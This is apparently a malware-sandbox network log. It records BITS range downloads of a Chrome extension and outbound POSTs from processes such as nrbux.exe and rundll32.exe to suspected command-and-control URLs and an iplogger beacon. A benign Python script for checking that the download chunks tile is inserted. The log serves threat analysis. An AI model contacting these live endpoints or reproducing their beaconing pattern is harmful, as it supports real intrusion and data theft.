                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 621757
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77025
                                                                                                                                                                                        content-range: bytes 3539890-4161646/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=4161647-4904234
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 742588
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77025
                                                                                                                                                                                        content-range: bytes 4161647-4904234/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=4904235-5516805
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 612571
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77027
                                                                                                                                                                                        content-range: bytes 4904235-5516805/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
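The five complete exchanges above are one resumed download split into BITS range requests: each asks for a byte window under an If-Unmodified-Since precondition, and each 206 response carries the same etag ("2e2fe7") and last-modified, so the pieces only stitch back into the original .crx if they are contiguous and all came from one revision. Plain-HTTP Chrome Web Store traffic served from a Google edge cache (server: Google-Edge-Cache) is background noise in a sandbox run, not the sample's C2, but when carving the file out of a capture it is worth checking that the chunks actually tile. The script below is an added example for this report, not tria.ge's code: it parses Request/Response records in the layout shown here, with a sample constructed from the page's own values (only the headers the check reads are kept, plus the request the page cuts off), and flags length mismatches, gaps or overlaps, and validators that change mid-download. The record layout and the function names are this example's own assumptions.

```python
import re
from collections import namedtuple

# Constructed sample: the five complete BITS exchanges shown in this entry, cut
# down to the headers the check reads, plus the request the page cuts off.
SAMPLE_CAPTURE = """\
Request
Range: bytes=2272837-2821659
Response
HTTP/1.1 206 Partial Content
content-length: 548823
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
content-range: bytes 2272837-2821659/6760942
Request
Range: bytes=2821660-3539889
Response
HTTP/1.1 206 Partial Content
content-length: 718230
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
content-range: bytes 2821660-3539889/6760942
Request
Range: bytes=3539890-4161646
Response
HTTP/1.1 206 Partial Content
content-length: 621757
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
content-range: bytes 3539890-4161646/6760942
Request
Range: bytes=4161647-4904234
Response
HTTP/1.1 206 Partial Content
content-length: 742588
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
content-range: bytes 4161647-4904234/6760942
Request
Range: bytes=4904235-5516805
Response
HTTP/1.1 206 Partial Content
content-length: 612571
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
content-range: bytes 4904235-5516805/6760942
Request
If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
"""

Chunk = namedtuple("Chunk", "status start end total length etag last_modified")
RANGE_RE = re.compile(r"bytes=(\d+)-(\d+)")
CONTENT_RANGE_RE = re.compile(r"bytes (\d+)-(\d+)/(\d+)")

def parse_capture(text):
    """Walk Request/Response records as the report lays them out. A record without both
    a Range and a Content-Range (e.g. the request cut off at the page end) is skipped."""
    exchanges, cur, side = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "Request":
            cur, side = {"req": {}, "resp": {}, "status": ""}, "req"
            exchanges.append(cur)
        elif line == "Response":
            side = "resp"
        elif cur and line.startswith("HTTP/"):
            cur["status"] = line
        elif cur and ":" in line:
            key, value = line.split(":", 1)
            cur[side][key.strip().lower()] = value.strip()
    chunks = []
    for ex in exchanges:
        rng = RANGE_RE.search(ex["req"].get("range", ""))
        crng = CONTENT_RANGE_RE.search(ex["resp"].get("content-range", ""))
        if rng and crng:
            chunks.append(Chunk(ex["status"], int(crng[1]), int(crng[2]), int(crng[3]),
                                int(ex["resp"].get("content-length", -1)),
                                ex["resp"].get("etag", ""), ex["resp"].get("last-modified", "")))
    return chunks

def check_chunks(chunks):
    """Findings as strings; an empty list means the chunks tile the file contiguously
    and every one was served from the same revision (same etag and last-modified)."""
    if not chunks:
        return ["no complete range exchanges found"]
    issues, ref = [], chunks[0]
    for i, c in enumerate(chunks):
        tag = "chunk %d (%d-%d)" % (i, c.start, c.end)
        if not c.status.startswith("HTTP/1.1 206"):
            issues.append(tag + ": expected 206 Partial Content, got %r" % c.status)
        if c.length != c.end - c.start + 1:
            issues.append(tag + ": content-length %d != range size %d" % (c.length, c.end - c.start + 1))
        if c.total != ref.total:
            issues.append(tag + ": declared total changed from %d to %d" % (ref.total, c.total))
        if (c.etag, c.last_modified) != (ref.etag, ref.last_modified):
            issues.append(tag + ": validators changed mid-download (etag %s)" % c.etag)
        if i and c.start != chunks[i - 1].end + 1:
            issues.append(tag + ": gap or overlap after byte %d" % chunks[i - 1].end)
    return issues

def coverage(chunks):
    """(bytes present in the capture, declared file size): how much of the .crx this entry holds."""
    return sum(c.end - c.start + 1 for c in chunks), (chunks[0].total if chunks else 0)
```

On the page's own values `check_chunks` returns no findings and `coverage` reports 3243969 of 6760942 bytes, i.e. this entry holds less than half of the file; the bytes before offset 2272837 and after 5516805 were fetched in exchanges outside this section, so a carve from these five responses alone would be incomplete. A changed etag or last-modified between chunks is the case to treat as suspect: the BITS precondition should have produced a 412 rather than a 206 from a different revision.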

GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
Remote address: 34.104.35.123:80
Request
GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=5516806-5991422
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 474617
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77028
                                                                                                                                                                                        content-range: bytes 5516806-5991422/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=5991423-6466352
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 474930
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77029
                                                                                                                                                                                        content-range: bytes 5991423-6466352/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=6466353-6731810
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 265458
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77030
                                                                                                                                                                                        content-range: bytes 6466353-6731810/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=6731811-6760941
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 29131
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77031
                                                                                                                                                                                        content-range: bytes 6731811-6760941/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 209
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ad3a6100002f2c2fa2f000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Q4rFbFvf%2Bai5zJ0VS09LgFTsZaDxONGfz5h0hFSkkZQiNLefqz%2F4xWjpsd7YPfK4H9HRYPljtpvFZzynbZTHtZjZJptNyL8WH9RH6eFgdDewBa%2BkkWZfeLjYRGMUqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668617d70e732f2c-ORD
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /18hh57 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:16 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=57d6n1rga1sc8e4q7jcjr3avo6; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=51.79.72.176; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837955; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 1
                                                                                                                                                                                        whoami: afc45862ad0365903c902b507e8c40ea0e2e1ac2206a1305c4706af0b786dc86
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 155
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:15 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 327
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:17 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
Referer: http://lahuertasonora.com/upload/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 235
Host: lahuertasonora.com
Response
HTTP/1.0 404 Not Found
Date: Fri, 02 Jul 2021 07:17:20 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 334
Connection: close
Content-Type: text/html; charset=utf-8

DNS iecvlist.microsoft.com
chrome.exe
Remote address: 8.8.8.8:53
Request
iecvlist.microsoft.com IN A
Response
iecvlist.microsoft.com IN CNAME ie9comview.vo.msecnd.net
ie9comview.vo.msecnd.net IN CNAME cs9.wpc.v0cdn.net
cs9.wpc.v0cdn.net IN A 152.199.19.161

POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache

POST http://185.215.113.55//t5BnOoke2/index.php
rundll32.exe
Remote address: 185.215.113.55:80
Request
POST //t5BnOoke2/index.php HTTP/1.1
Host: 185.215.113.55
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:17:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Refresh: 1; url = login.php
Content-Length: 0
Content-Type: text/html; charset=UTF-8

POST http://iw.gamegame.info/report7.4.php
